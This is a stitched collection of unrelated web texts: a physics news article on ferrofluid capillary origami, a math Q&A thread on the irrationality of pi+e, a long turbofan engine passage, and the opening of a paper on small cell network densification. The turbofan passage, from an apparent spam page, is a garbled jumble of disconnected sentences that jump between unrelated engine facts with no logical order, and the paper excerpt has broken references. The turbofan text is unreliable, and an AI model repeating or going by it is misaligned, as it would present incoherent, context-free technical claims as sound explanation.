# Focus: Magnetic Field Flips Miniature Origami Published November 11, 2011  |  Physics 4, 93 (2011)  |  DOI: 10.1103/Physics.4.93 #### Instability of the Origami of a Ferrofluid Drop in a Magnetic Field Timothée Jamin, Charlotte Py, and Eric Falcon Published November 11, 2011 T. Jamin/CNRS Paris Diderot Univ. A membrane wrapped around a ferrofluid droplet changes shape as a vertical magnetic field increases, eventually flipping into a new configuration when the field strength reaches a critical value. In the technique known as capillary origami, the surface tension of a drop of liquid folds a small flexible membrane into a desired shape. Researchers reporting in Physical Review Letters augment the technique with a new trick: By using a fluid that is susceptible to magnetic forces, they can actively control the shape of the folded object as it forms. They also discovered an unexpected instability in which the membrane switches abruptly from one shape to another. The method could be used in the future to control the shape of a micromechanical component during the operation of a device. In the original demonstration of capillary origami (see video from 11 April 2007 Focus story), surface tension caused a thin membrane cut into a flowerlike pattern to wrap itself around a drop of water placed upon it, creating a boxlike structure. For a given membrane pattern and water drop size, elementary physics determined the three-dimensional structure produced. Timothée Jamin, Charlotte Py, and Eric Falcon, of the French National Center for Scientific Research (CNRS) and Paris Diderot University, have now worked a variation on this method by substituting a so-called ferrofluid for the drop of water. In their experiments, the ferrofluid was a suspension in water of nanometer-sized particles of maghemite (${\text{Fe}}_{2}{\text{O}}_{3}$). 
Placed in a vertical magnetic field of steadily increasing strength, a globule of this ferrofluid grew taller, going from a roughly spherical shape into a conical form with the vertex at the top, and finally into an object resembling a bullet standing on end. In a series of tests, the researchers placed single drops of the ferrofluid onto membranes of a rubbery material (polydimethylsiloxane) that was between 50 and 100 micrometers thick and cut into equilateral triangles 5 to 15 millimeters on a side. In each case, in the absence of a magnetic field, the triangle curled up around the droplet, so that its corners met. As before, applying a magnetic field distended the ferrofluid drop, but with the membrane clinging to its sides, the drop grew into an approximately triangular pyramid whose height increased with the strength of the field. However, the surface tension between the membrane and the ferrofluid prevented the fluid pyramid from growing as high as it would on its own. As the magnetic field strength grew and the pyramid tried to become taller and narrower, it became harder for the membrane to wrap around it in a smooth way. At a critical value of the field strength, the system suddenly resolved by flipping into a new configuration. The base of the pyramid switched from the center of the triangular membrane toward one of its corners, and it transformed into a taller circular cone, rebalancing the magnetic and gravitational forces. At the same time, the membrane climbed higher up the cone and wrapped around it in a new configuration. "This is a fascinating twist on the capillary origami story—as the ferrofluid tries to elongate vertically out of the clutches of its pyramidal wrapper, the wrapper suddenly slips itself around into a new lower-stress shape," says Glen McHale of Nottingham Trent University in England.
The critical magnetic field strength for this "overturning" instability depends on the size of the fluid drop and membrane, the authors found. The method lends itself to miniaturization, Falcon says, because the required field strengths would be lower for smaller origami systems. "It thus could provide a useful tool for making 3D microstructure shapes and for dynamically changing their shapes by means of a magnetic field." McHale notes that practical applications of the technique may be complicated by the fact that the instability is not reversible—that is, when the magnetic field is decreased, the membrane folds over into a different shape than the one it had at the start. Still, he says, "I love the experiment." –David Lindley David Lindley is a freelance writer in Alexandria, Virginia, and author of Uncertainty: Einstein, Heisenberg, Bohr and the Struggle for the Soul of Science (Doubleday, 2007).
http://math.stackexchange.com/questions/159350/why-is-it-hard-to-prove-whether-pie-is-an-irrational-number
# Why is it hard to prove whether $\pi+e$ is an irrational number? From this list I came to know that it is hard to determine whether $\pi+e$ is irrational. Can somebody discuss, with references, why this is hard? Is it still an open problem? If so, it would be helpful to any student to know what kinds of ideas have already been tried but ultimately failed to settle it. - According to mathworld, it's still an open problem: mathworld.wolfram.com/e.html – Cocopuffs Jun 17 '12 at 6:39 The same thing is asked in (a part of) this question: math.stackexchange.com/questions/28243/… – Martin Sleziak Jun 17 '12 at 6:41 I don't think this is precisely a duplicate of the other question, as this one asks for references and discussion about why previous techniques are insufficient to resolve the problem. (I've edited the title to match.) This can be more illuminating than a simple yes/no answer, which is what the previous question received. – Rahul Jun 17 '12 at 6:51 Why shouldn't it be hard? – Qiaochu Yuan Jun 17 '12 at 7:32 @Qiaochu, I agree that the obvious answer to the stated question is "why not?", but negative results about what kinds of techniques cannot possibly work can still give much insight. For example, there are several results regarding what classes of proofs are insufficiently powerful to resolve P vs. NP. I've upvoted this question because I guess I'm hoping to learn something similar here. – Rahul Jun 17 '12 at 8:01 "Why is this hard?" I think a different question would be "Why would it be easy?" But there are some things that are known. It is known that $\pi$ and $e$ are transcendental. Thus $(x-\pi)(x-e) = x^2 - (e + \pi)x + e\pi$ cannot have rational coefficients. So at least one of $e + \pi$ and $e\pi$ is irrational. It's also known that at least one of $e \pi$ and $e^{\pi^2}$ is irrational (see, e.g., this post at MO).
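The quadratic argument in the answer can be illustrated numerically: $\pi$ and $e$ are the two roots of $x^2 - (e+\pi)x + e\pi$, so if both $e+\pi$ and $e\pi$ were rational, $\pi$ would be algebraic, contradicting its transcendence. The sketch below merely recovers the roots from the sum and product; it proves nothing about irrationality, of course.

```python
import math

# pi and e are the roots of x^2 - (e + pi) x + e*pi = 0, so knowing the
# sum s = e + pi and product p = e*pi determines both via the quadratic
# formula. If s and p were both rational, pi would be algebraic.

s = math.e + math.pi          # coefficient of -x
p = math.e * math.pi          # constant term
disc = math.sqrt(s * s - 4 * p)
r1, r2 = (s + disc) / 2, (s - disc) / 2   # larger root first

assert math.isclose(r1, math.pi) and math.isclose(r2, math.e)
print(r1, r2)
```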
http://buenocamp.net/bromo-hzvh/page.php?c6392e=turbofan-engine-diagram
For airliners and cargo aircraft, the in-service fleet in 2016 is 60,000 engines and should grow to 103,000 in 2035 with 86,500 deliveries according to Flight Global.[8] For example, the same helicopter weight can be supported by a high power engine and small diameter rotor or, for less fuel, a lower power engine and bigger rotor with lower velocity through the rotor. The world's first turbofan series-built airliner was the Soviet Tupolev Tu-124, with Soloviev D-20 engines,[35][36] introduced in 1962. Originally standard polycrystalline metals were used to make fan blades, but developments in material science have allowed blades to be constructed from aligned metallic crystals and more recently single crystals to operate at higher temperatures with less distortion. Most civil turbofans use a high-efficiency, 2-stage HP turbine to drive the HP compressor. Early turbojet engines were not very fuel-efficient because their overall pressure ratio and turbine inlet temperature were severely limited by the technology available at the time. A bypass flow can be added only if the turbine inlet temperature is not too high to compensate for the smaller core flow. A jet engine is a type of reaction engine discharging a fast-moving jet that generates thrust by jet propulsion. While this broad definition can include rocket, water jet, and hybrid propulsion, the term jet engine typically refers to an airbreathing jet engine such as a turbojet, turbofan, ramjet, or pulse jet.
Hot gas from the turbojet turbine exhaust expanded through the LP turbine, the fan blades being a radial extension of the turbine blades. A majority will be medium-thrust engines for narrow-body aircraft with 54,000 deliveries, for a fleet growing from 28,500 to 61,000. Additive manufacturing in the advanced turboprop will reduce weight by 5% and fuel burn by 20%. The word "turbofan" is a portmanteau of "turbine" and "fan": the turbo portion refers to a gas turbine engine which achieves mechanical energy from combustion,[1] and the fan, a ducted fan that uses the mechanical energy from the gas turbine to accelerate air rearwards. An afterburner is a combustor located downstream of the turbine blades and directly upstream of the nozzle, which burns fuel from afterburner-specific fuel injectors. At low flight speeds the nozzle is unchoked (less than a Mach number of unity), so the exhaust gas speeds up as it approaches the throat and then slows down slightly as it reaches the divergent section.[37] The Full Authority Digital Engine Control (FADEC) needs accurate data for controlling the engine. The Snecma M53, which powers Dassault Mirage 2000 fighter aircraft, is an example of a single-shaft turbofan. All jet engines, which are also called gas turbines, work on the same principle.
To illustrate one aspect of how a turbofan differs from a turbojet, they may be compared, as in a re-engining assessment, at the same airflow (to keep a common intake for example) and the same net thrust. High-thrust engines for wide-body aircraft, worth 40–45% of the market by value, will grow from 12,700 engines to over 21,000 with 18,500 deliveries. One of the earliest turbofans was a derivative of the General Electric J79 turbojet, known as the CJ805-23, which featured an integrated aft fan/low-pressure (LP) turbine unit located in the turbojet exhaust jetpipe.[30] Because of the much lower bypass ratios employed, military turbofans require only one or two LP turbine stages. Consequently, the HP compressor need develop only a modest pressure ratio (e.g., ~4.5:1). The first three-spool engine was the earlier Rolls-Royce RB.203 Trent of 1967. Consequently, more T-stages are required to develop the necessary pressure rise. Some high-bypass-ratio civil turbofans use an extremely low area ratio (less than 1.01), convergent-divergent nozzle on the bypass (or mixed exhaust) stream, to control the fan working line. This post is part of a three-part series comparing piston, turboprop, turbofan, and turbojet engines. Pratt & Whitney also have a joint venture, International Aero Engines with Japanese Aero Engine Corporation and MTU Aero Engines of Germany, specializing in engines for the Airbus A320 family. The major principle in all these engines is the same. Schematic diagram illustrating the operation of a 2-spool, low-bypass turbofan engine, with LP spool in green and HP spool in purple.
[41] Safran can probably deliver another 10–15% in fuel efficiency through the mid-2020s before reaching an asymptote, and next will have to introduce a breakthrough: to increase the bypass ratio to 35:1 instead of 11:1 for the CFM LEAP, it is demonstrating a counter-rotating open rotor unducted fan (propfan) in Istres, France, under the European Clean Sky technology program. In some arrangements, some of the fan blades turn with the shaft and some blades remain stationary. [16] The thrust (FN) generated by a turbofan depends on the effective exhaust velocity of the total exhaust, as with any jet engine, but because two exhaust jets are present the thrust equation can be expanded as the sum of the momentum thrusts of the core and bypass streams:[17] FN = ṁ_c·(V_c − V_a) + ṁ_f·(V_f − V_a). Although the higher temperature rise across the compression system implies a larger temperature drop over the turbine system, the mixed nozzle temperature is unaffected, because the same amount of heat is being added to the system. Under these circumstances, the throat area dictates the fan match and, being smaller than the exit, pushes the fan working line slightly towards surge. Low specific thrust engines tend to have a high bypass ratio, but this is also a function of the temperature of the turbine system. Increasing the latter may require better compressor materials. However, better turbine materials or improved vane/blade cooling are required to cope with increases in both turbine rotor inlet temperature and compressor delivery temperature. Reducing core flow also increases bypass ratio. Most of the configurations discussed above are used in civilian turbofans, while modern military turbofans (e.g., Snecma M88) are usually basic two-spool. Under the U.S. Air Force's Adaptive Engine Transition Program, adaptive thermodynamic cycles will be used for the sixth-generation jet fighter, based on a modified Brayton cycle and constant volume combustion.
The situation is reversed for a medium specific thrust afterburning turbofan: i.e., poor afterburning SFC/good dry SFC. Modern fighter planes actually use low bypass ratio turbofans. US civil engines use much higher HP compressor pressure ratios (e.g., ~23:1). In theory, by adding IP compressor stages, a modern military turbofan HP compressor could be used in a civil turbofan derivative, but the core would tend to be too small for high thrust applications. Off-design performance and stability are, however, affected by engine configuration. This cycle analysis considers on-design conditions. In some engines, such as the turbofan, thrust is generated by both approaches: a major part of the thrust is derived from the fan, which is powered by a low-pressure turbine and which energizes and accelerates the bypass stream. Other high-bypass turbofans are the Pratt & Whitney JT9D, the three-shaft Rolls-Royce RB211 and the CFM International CFM56; also the smaller TF34. As bypass ratio increases, the fan blade tip speed increases relative to the LPT blade speed. Unlike some military engines, modern civil turbofans lack stationary inlet guide vanes in front of the fan rotor. The core nozzle is more conventional, but generates less of the thrust, and depending on design choices, such as noise considerations, may conceivably not choke.[18] Turbofan engines come in a variety of configurations.
These terms express power in a fundamentally different way and require understanding the mechanical concepts behind turbine engines. On this page, we will discuss some of the fundamentals of turbofan engines. Since the 1970s, most jet fighter engines have been low/medium bypass turbofans with a mixed exhaust, afterburner and variable area final nozzle. Decher, S., Rauch, D., "Potential of the High Bypass Turbofan," American Society of Mechanical Engineers paper 64-GTP-15, presented at the Gas Turbine Conference and Products Show, Houston, Texas, March 1–5, 1964. [39] Rolls-Royce pioneered the hollow, titanium wide-chord fan blade in the 1980s, for aerodynamic efficiency and foreign object damage resistance, in the RB211 and then the Trent. According to the T-s diagram of an ideal turbojet engine, the thermal efficiency simplifies to η_th = 1 − r_p^(−(γ−1)/γ), where r_p is the overall pressure ratio and γ the ratio of specific heats. The resulting turbofan, with reasonable efficiencies and duct loss for the added components, would probably operate at a higher nozzle pressure ratio than the turbojet, but with a lower exhaust temperature to retain net thrust. Propeller engines are most efficient for low speeds, turbojet engines for high speeds, and turbofan engines between the two. Instead, a turbofan can be thought of as a turbojet being used to drive a ducted fan, with both of those contributing to the thrust. Jet engines move the airplane forward with a great force produced by a tremendous thrust, which causes the plane to fly very fast. Exotic cycles, heat exchangers and pressure gain/constant volume combustion can improve thermodynamic efficiency. Because modern civil turbofans operate at low specific thrust, they require only a single fan stage to develop the required fan pressure ratio.
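The thermal efficiency of the ideal turbojet cycle mentioned above can be evaluated numerically. A minimal sketch, assuming the standard ideal Brayton-cycle result and γ = 1.4 for air (the function name and sample pressure ratios are ours, purely illustrative):

```python
# Ideal-cycle (Brayton) thermal efficiency of a turbojet as a function of
# the overall pressure ratio r_p: eta_th = 1 - r_p**(-(gamma - 1) / gamma).

def brayton_thermal_efficiency(pressure_ratio: float, gamma: float = 1.4) -> float:
    """Ideal-cycle thermal efficiency for a given overall pressure ratio."""
    if pressure_ratio < 1.0:
        raise ValueError("pressure ratio must be >= 1")
    return 1.0 - pressure_ratio ** (-(gamma - 1.0) / gamma)

# Efficiency rises monotonically with pressure ratio, which is why raising
# the overall pressure ratio of the core improves thermal efficiency.
for rp in (10, 23, 40):
    print(rp, round(brayton_thermal_efficiency(rp), 3))
```

The ~23:1 HP compressor pressure ratio quoted for civil engines sits well up this curve, consistent with the text's point that core thermal efficiency gains come from higher overall pressure ratios.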
As the HP compressor has a modest pressure ratio, its speed can be reduced surge-free without employing variable geometry. Turbofan engines continue their superiority in most present commercial airliners and military planes, as well as some rockets for sustained flight. Many turbofans have at least a basic two-spool configuration where the fan is on a separate low pressure (LP) spool, running concentrically with the compressor or high pressure (HP) spool; the LP spool runs at a lower angular velocity, while the HP spool turns faster and its compressor further compresses part of the air for combustion. Two-stream turbofan engine diagram of major components. [41] For GE Aviation, the energy density of jet fuel still maximises the Breguet range equation, and higher pressure ratio cores, lower pressure ratio fans, low-loss inlets and lighter structures can further improve thermal, transfer and propulsive efficiency. Modern civil turbofans have multi-stage LP turbines (anywhere from 3 to 7). Further improvements in core thermal efficiency can be achieved by raising the overall pressure ratio of the core. Consequently, the nozzle exit area controls the fan match and, being larger than the throat, pulls the fan working line slightly away from surge. Because the fuel flow rate for the core is changed only a small amount by the addition of the fan, a turbofan generates more thrust for nearly the same amount of fuel used by the core. Consequently, afterburning can be used only for short portions of a mission (e.g., cross border skirmishes). Simple diagram of how a jet turbofan engine works. The corresponding bypass ratio is therefore relatively low. A turbofan gets some of its thrust from the core and some of its thrust from the fan. One of the problems with the aft fan configuration is hot gas leakage from the LP turbine to the fan. Obviously, the core of the turbofan must produce sufficient power to drive the fan via the low-pressure (LP) turbine.
Links to the turbofan engine calculator and the turbojet h-s diagram comparator. The turbofan engine is an advanced version of the turbojet engine, in which shaft work is used to drive a fan that takes in a large amount of air, compresses it, and directs it through the exhaust to generate thrust. The single-stream net thrust is F_n = ṁ·(V_jfe − V_a). Modern military turbofans also tend to use a single HP turbine stage and a modest HP compressor. In effect, a turbofan emits a large amount of air more slowly, whereas a turbojet emits a smaller amount of air quickly, which is a far less efficient way to generate the same thrust. The primary goal of this analysis is to introduce the trends of a turbine engine when compared across an increasing BPR. CMCs will be used ten times more by the mid-2020s: the CFM LEAP requires 18 CMC turbine shrouds per engine, and the GE9X will use them in the combustor and for 42 HP turbine nozzles. The engine was aimed at ultra quiet STOL aircraft operating from city centre airports. Each turbo-machinery model contains a performance map that determines a corrected mass flow for a given shaft speed and pressure ratio. Turbofans represent an intermediate stage between turbojets, which derive all their thrust from exhaust gases, and turboprops, which derive minimal thrust from exhaust gases (typically 10% or less).
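The net-thrust relation above can be applied per exhaust stream to see why moving more air more slowly generates the same thrust for less wasted kinetic energy. A hedged sketch with purely illustrative numbers (not data for any real engine):

```python
def net_thrust(mdot, v_exhaust, v_flight):
    """Single-stream net thrust, F_n = mdot * (V_exhaust - V_flight), in N."""
    return mdot * (v_exhaust - v_flight)

def jet_power(mdot, v_exhaust, v_flight):
    """Rate of kinetic energy added to the stream, in W."""
    return 0.5 * mdot * (v_exhaust**2 - v_flight**2)

V0 = 250.0  # flight speed, m/s (illustrative)

# Turbojet: small airflow, fast jet.
tj_thrust = net_thrust(80.0, 900.0, V0)
tj_power = jet_power(80.0, 900.0, V0)

# Turbofan with the same net thrust: fan stream plus core stream,
# far more air moved far more slowly.
tf_thrust = net_thrust(400.0, 360.0, V0) + net_thrust(80.0, 350.0, V0)
tf_power = jet_power(400.0, 360.0, V0) + jet_power(80.0, 350.0, V0)

print(tj_thrust, tf_thrust)  # 52000.0 52000.0 -> equal thrust
print(tj_power > tf_power)   # True -> the turbojet wastes more jet power
```

At equal thrust the turbojet here adds roughly twice the kinetic power to its exhaust, which is the "far less efficient way to generate the same thrust" the text describes.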
One of the most important requirements during the certification of an engine is the engine's ability to withstand catastrophic failure due to the loss of one of the fan blades. Examples of this configuration are the long-established Garrett TFE731, the Honeywell ALF 502/507, and the recent Pratt & Whitney PW1000G. However, the pilot can afford to stay in afterburning only for a short period, before aircraft fuel reserves become dangerously low. Thus, whereas all the air taken in by a turbojet passes through the turbine (through the combustion chamber), in a turbofan some of that air bypasses the turbine. The engine produces thrust through a combination of these two portions working together; engines that use more jet thrust relative to fan thrust are known as low-bypass turbofans, and conversely those that have considerably more fan thrust than jet thrust are known as high-bypass. Some of the incoming air passes through the fan and continues on into the core compressor and then the burner. [15] The turbofan has additional losses from its extra turbines, fan, bypass duct, and extra propelling nozzle compared to the turbojet's single nozzle. When lit, prodigious amounts of fuel are burnt in the afterburner, raising the temperature of exhaust gases by a significant degree, resulting in a higher exhaust velocity/engine specific thrust. The preliminary design phase for this modified engine starts with the aerothermodynamic cycle analysis, consisting of parametric (i.e., on-design) and performance (i.e., off-design) cycle analyses. Current low-bypass military turbofans include the Pratt & Whitney F119, the Eurojet EJ200, the General Electric F110, the Klimov RD-33, and the Saturn AL-31, all of which feature a mixed exhaust, afterburner and variable area propelling nozzle.
Trent 1000 cracked blades grounded almost 50 Boeing 787s and reduced ETOPS to 2.3 hours down from 5.5, costing Rolls-Royce plc almost $950 million. Together, these parameters tend to increase core thermal efficiency and improve fuel efficiency. In a zero-bypass (turbojet) engine, the high temperature and high pressure exhaust gas is accelerated by expansion through a propelling nozzle and produces all the thrust. The cold duct and core duct's nozzle systems are relatively complex due to there being two exhaust flows. [41] Rotating and static ceramic matrix composite (CMC) parts operate 500 °F (260 °C) hotter than metal and are one-third its weight. To reduce the noise associated with jet flow, the aerospace industry has sought to disrupt shear layer turbulence and reduce the overall noise produced. Coincidentally, the bypass ratio grew to achieve higher propulsive efficiency and the fan diameter increased. Unlike the main combustor, where the downstream turbine blades must not be damaged by high temperatures, an afterburner can operate at the ideal maximum (stoichiometric) temperature (i.e., about 2100 K/3780 °Ra/3320 °F/1826 °C). The CFM LEAP introduction was smoother, but a ceramic composite HP turbine coating was prematurely lost, necessitating a new design and causing 60 A320neo engine removals for modification, with deliveries up to six weeks late.
https://www.groundai.com/project/density-analysis-of-small-cell-networks-from-noise-limited-to-dense-interference-limited/
# Density Analysis of Small Cell Networks: From Noise-Limited to Dense Interference-Limited

## Abstract

Considering both non-line-of-sight (NLOS) and line-of-sight (LOS) transmissions, the transitional behaviors from the noise-limited regime to the dense interference-limited regime are elaborated for fifth generation (5G) small cell networks (SCNs). We identify four performance regimes based on base station (BS) density: (i) the noise-limited regime, (ii) the signal NLOS-to-LOS-transition regime, (iii) the interference NLOS-to-LOS-transition regime, and (iv) the dense interference-limited regime. To analytically illustrate these regimes, we propose a unified framework characterizing future 5G wireless networks over generalized shadowing/fading channels. Simulation results indicate that different factors, i.e., noise, desired signal and interference, successively and separately dominate the network performance as the BS density increases. Hence, our results shed light on the design and management of SCNs in urban and rural areas with different BS deployment densities.

## 1 Introduction

According to the study of Prof. Webb [1], wireless capacity increased about one million fold from 1950 to 2000. The data show that most of that improvement was achieved by cell splitting and network densification, while the rest of the gain was mainly obtained from the use of a wider spectrum, better coding techniques and modulation schemes. In this context, network densification has been, and will remain, the main force behind the increase of data rates in the future fifth generation (5G) wireless networks [2], due to its large spectrum reuse as well as its easy management.
In this paper, we focus on the analysis of transitional behaviors for small cell networks (SCNs) using an orthogonal deployment with the existing macrocells, i.e., small cells and macrocells operating on different frequency spectrum [4]. Regarding the network performance of SCNs, a fundamental question is: what is the performance trend of SCNs as the base station (BS) density increases? In this paper, we answer this question and identify four performance regimes based on BS density, taking non-line-of-sight (NLOS) and line-of-sight (LOS) transmissions into account. These four performance regimes are: (i) the noise-limited regime, (ii) the signal NLOS-to-LOS-transition regime, (iii) the interference NLOS-to-LOS-transition regime, and (iv) the dense interference-limited regime. To analytically illustrate these regimes, we propose a unified framework characterizing future 5G wireless networks over generalized shadowing/fading channels. The main contributions of this paper are as follows:

• We reveal the transitional behaviors from the noise-limited regime to the dense interference-limited regime in SCNs and analyze in detail the factors that affect the performance trend. The analysis results will benefit the design and management of SCNs in urban and rural areas with different BS deployment densities.

• We identify four performance regimes based on BS density. For the discovered regimes, we present tractable definitions for the regime boundaries. More specifically:

  • the boundary between the noise-limited regime and the signal NLOS-to-LOS-transition regime;

  • the boundary between the signal NLOS-to-LOS-transition regime and the interference NLOS-to-LOS-transition regime;

  • the boundary between the interference NLOS-to-LOS-transition regime and the dense interference-limited regime.
• An accurate SCN model and generalized theoretical analysis: to characterize the NLOS-to-LOS transitional behaviors in SCNs, we propose a unified framework, applicable to a SCN using the strongest-received-signal-power association, assuming generalized shadowing/fading channels and incorporating both NLOS and LOS transmissions.

The remainder of this paper is organized as follows. Section 2 presents motivations and some recent work closely related to ours. Section 3 introduces the system model and network assumptions. An important theorem used in the analysis, which transforms the original network into an equivalent distance-dependent network, i.e., the Equivalence Theorem, is presented and proven in Section 4. Section 5 studies the coverage probability and the ASE of SCNs. Section 6 provides a comparison with another cell association scheme. In Section 7, the analytical results are validated via Monte Carlo simulations; moreover, the transitional behaviors are elaborated and tractable definitions for the regime boundaries are presented. Finally, Section 8 concludes this paper and discusses possible future work.

## 2 Motivations and Related Work

The modeling of the spatial distribution of SCNs using stochastic geometry has resulted in significant progress in understanding the performance of cellular networks [7]. Random spatial point processes, especially the homogeneous Poisson point process (PPP), have been widely used to model the locations of small cell BSs in various scenarios. Existing results typically analyze performance assuming that the networks operate in the noise-limited regime or the interference-limited regime. However, the transitional behaviors from the noise-limited regime to the interference-limited regime were rarely addressed in that work.
Some assumptions in the system models even conflict with each other; e.g., in [10] and [11], millimeter wave networks were assumed to be noise-limited and interference-limited, respectively. Besides, most work is based on certain simplified assumptions, e.g., Rayleigh fading, a single path loss exponent, no thermal noise, etc., for analytical tractability, which may not hold in more realistic scenarios. For instance, for a SCN in urban areas, the path loss may not follow a single power-law relationship in the near field, so a non-singular [12] or multi-slope [14] path loss model should be applied. Besides, signal transmissions between BSs and mobile users (MUs) are frequently affected by reflection, diffraction, and even blockage due to high-rise buildings in urban areas, so NLOS/LOS transmissions should also be considered [11]. As a consequence, a detailed analysis of the transitional behaviors is needed, considering a more generalized propagation model incorporating both NLOS and LOS transmissions, to cope with these new characteristics of SCNs. A number of more recent works had a new look at dense SCNs considering more practical propagation models. The system model closest to the one in this paper is in [15]. In [15], the transitional behavior of interference in millimeter wave networks was analyzed, but the focus was on the medium access control. In [11] and [16], the coverage probability and capacity were calculated based on the smallest-path-loss cell association model, assuming multi-path fading modeled as Rayleigh fading and Nakagami-m fading, respectively. However, shadowing was ignored in their models, which may not be very practical for a SCN. The authors of [10] and [17] analyzed the coverage and capacity performance of millimeter wave cellular networks. In [10], self-backhauled millimeter wave cellular networks were analyzed assuming a cell association scheme based on the smallest path loss.
In [17], a three-state statistical model for each link was assumed, in which a link can be in a NLOS, a LOS, or an outage state. Besides, both [10] and [17] assumed a noise-limited network ignoring inter-cell interference, which may not be very practical since modern wireless networks generally work in an interference-limited region. In [18], the authors assumed Rayleigh fading for NLOS transmissions and Nakagami-m fading for LOS transmissions, which is more practical than the work in [16]. However, the cell association scheme in [18] is only applicable to scenarios where the SINR threshold is greater than 0 dB. Besides, the ASE performance was not analyzed in [18]. In [12], a near-field path loss model with bounded path loss was studied. In [19], a tractable performance evaluation method, i.e., intensity matching, was proposed to model and optimize the networks. To summarize, in this paper we propose a more generalized framework to analyze the transitional behaviors of SCNs compared with the work in [15]. Our framework takes into account a cell association scheme based on the strongest received signal power, probabilistic NLOS and LOS transmissions, and multi-path fading and/or shadowing. Furthermore, the proposed framework can also be applied to analyze dense SCNs where BSs are distributed according to non-homogeneous PPPs, i.e., where the BS density is spatially varying.

## 3 System Model

We consider a homogeneous SCN in urban areas and focus on the analysis of downlink performance. Assume that BSs are spatially distributed on an infinite plane and that the locations of BSs follow a homogeneous PPP, denoted by Φ = {b_i}, with a density of λ BSs per unit area, where i is the BS index. MUs are deployed according to another independent homogeneous PPP, denoted by Φ_u, with a density of λ_u. All BSs in the network operate at the same power and share the same bandwidth.
Within a cell, MUs use orthogonal frequencies for downlink transmissions, and therefore intra-cell interference is not considered in our analysis. However, adjacent BSs may generate inter-cell interference to MUs, which is the main focus of our work.

### 3.1 Path Loss Model

We incorporate both NLOS and LOS transmissions into the path loss model, whose performance impact has attracted growing interest among researchers recently. In reality, the occurrence of NLOS or LOS transmissions depends on various environmental factors, including geographical structure, distance and clusters, etc. The following definition gives a simplified one-parameter model of NLOS and LOS transmissions. The occurrences of NLOS and LOS transmissions are modeled using probabilities Pr_NLOS(r) and Pr_LOS(r), respectively. The probabilities are functions of the distance between a BS and a MU which satisfy Pr_NLOS(r) + Pr_LOS(r) = 1, where r denotes the Euclidean distance between a BS and the typical MU (aka the probe MU or the tagged MU) located at the origin. Regarding the mathematical form of Pr_LOS(r) (or Pr_NLOS(r)), N. Blaunstein [20] formulated Pr_LOS(r) as a negative exponential function, i.e., Pr_LOS(r) = exp(−β r), where β is a parameter determined by the density and the mean length of the blockages lying in the visual path between the typical MU and BSs. Bai [21] extended N. Blaunstein's work using random shape theory, which shows that β is determined not only by the mean length but also by the mean width of the blockages. The authors of [17] and [21] approximated Pr_LOS(r) using piece-wise functions and step functions, respectively. The authors of [16] considered Pr_LOS(r) to be a linear function and a two-piece exponential function, respectively; both are recommended by the 3GPP. It should be noted that the occurrence of NLOS (or LOS) transmissions is assumed to be independent for different BS-MU pairs.
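The one-parameter negative-exponential model and the independent per-link marking it induces can be sketched as follows; the β value is purely illustrative and the function names are ours, not the paper's:

```python
import math
import random

def p_los(r, beta=0.01):
    """Negative-exponential LOS probability: Pr_LOS(r) = exp(-beta * r)."""
    return math.exp(-beta * r)

def p_nlos(r, beta=0.01):
    """Complement of p_los, so the two probabilities sum to 1 at every r."""
    return 1.0 - p_los(r, beta)

def thin(distances, beta=0.01, rng=None):
    """Independently mark each BS as LOS or NLOS, yielding the two thinned
    point sets (the LOS and NLOS point processes described in the text)."""
    rng = rng or random.Random(0)
    los, nlos = [], []
    for r in distances:
        (los if rng.random() < p_los(r, beta) else nlos).append(r)
    return los, nlos

los, nlos = thin([50.0, 120.0, 300.0, 700.0])
assert len(los) + len(nlos) == 4  # the thinning partitions the original set
```

Nearby BSs are more likely to land in the LOS set and distant ones in the NLOS set, matching the intuition that blockage accumulates with distance.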
Though such an assumption might not be entirely realistic, e.g., NLOS transmissions caused by a large obstacle may be spatially correlated, the authors of [21] showed that the impact of the independence assumption on the SINR analysis is negligible. Note that, from the viewpoint of the typical MU, each BS on the infinite plane is either a NLOS BS or a LOS BS. Accordingly, we perform a thinning procedure on the points of the PPP Φ to model the distributions of NLOS BSs and LOS BSs, respectively. That is, each BS in Φ is kept if it has a NLOS transmission with the typical MU, forming a new point process denoted by Φ_NL, while the remaining BSs form another point process, denoted by Φ_L, representing the set of BSs with a LOS path to the typical MU. As a consequence of the independence assumption between LOS and NLOS transmissions mentioned above, Φ_NL and Φ_L are two independent non-homogeneous PPPs with intensities λ Pr_NLOS(r) and λ Pr_LOS(r), respectively. In general, NLOS and LOS transmissions incur different path losses, captured by PL_NLOS(r) = A_NLOS + α_NLOS · 10 log10(r) + η_NLOS and PL_LOS(r) = A_LOS + α_LOS · 10 log10(r) + η_LOS, where the path loss is expressed in dB, A_NLOS and A_LOS are the path losses at the reference distance (usually at 1 meter), α_NLOS and α_LOS are the respective path loss exponents for NLOS and LOS transmissions, and η_NLOS and η_LOS are independent Gaussian random variables with zero means, i.e., η_NLOS ~ N(0, σ_NLOS²) and η_LOS ~ N(0, σ_LOS²), reflecting the signal attenuation caused by shadow fading. The corresponding model parameters can be found in [22]. Accordingly, the received signal powers for NLOS and LOS transmissions in W (watt) can be expressed as P_NLOS(r) = P_t · a_NLOS · g_NLOS · r^(−α_NLOS) and P_LOS(r) = P_t · a_LOS · g_LOS · r^(−α_LOS), respectively, where g_NLOS (or g_LOS) denotes the log-normal shadowing for the NLOS (or LOS) transmission, and P_t, a_NLOS and a_LOS are all constants.
Therefore, the received power at the typical MU from BS b_i is given by P_i = W_i P_NLOS(r_i) + (1 − W_i) P_LOS(r_i), where W_i is a random indicator variable which equals 1 for a NLOS transmission and 0 for a LOS transmission, with corresponding probabilities Pr_NLOS(r_i) and Pr_LOS(r_i), respectively. Based on the path loss model discussed above, for downlink transmissions the SINR experienced by the typical MU associated with BS b_i can be written as SINR_i = P_i / (Σ_{j≠i} P_j + N0), where the sum runs over the Palm point process [26] representing the set of interfering BSs, and N0 denotes the noise power at the MU side, which is assumed to be additive white Gaussian noise (AWGN).

### 3.2 Cell Association Scheme

Considering NLOS and LOS transmissions, two cell association schemes can be chosen, i.e., the maximum average received power and the maximum instantaneous SINR. In our work, we assume the typical MU connects with the BS that provides the highest SINR [8]. More specifically, the typical MU associates itself with the BS b* = arg max_i SINR_i. Intuitively, the highest-SINR association is equivalent to the strongest-received-signal-power association. This intuition is formally presented and proved in Lemma ?, which states that providing the highest SINR is equivalent to providing the strongest received power to the typical MU. It follows from Eq. (6) and Lemma ? that the BS associated with the typical MU can also be written as b* = arg max_i P_i. In the following, we mainly use Eq. (7) to characterize the considered cell association scheme.

## 4 The Equivalence of SCNs and the Distribution of the Strongest Received Signal Power

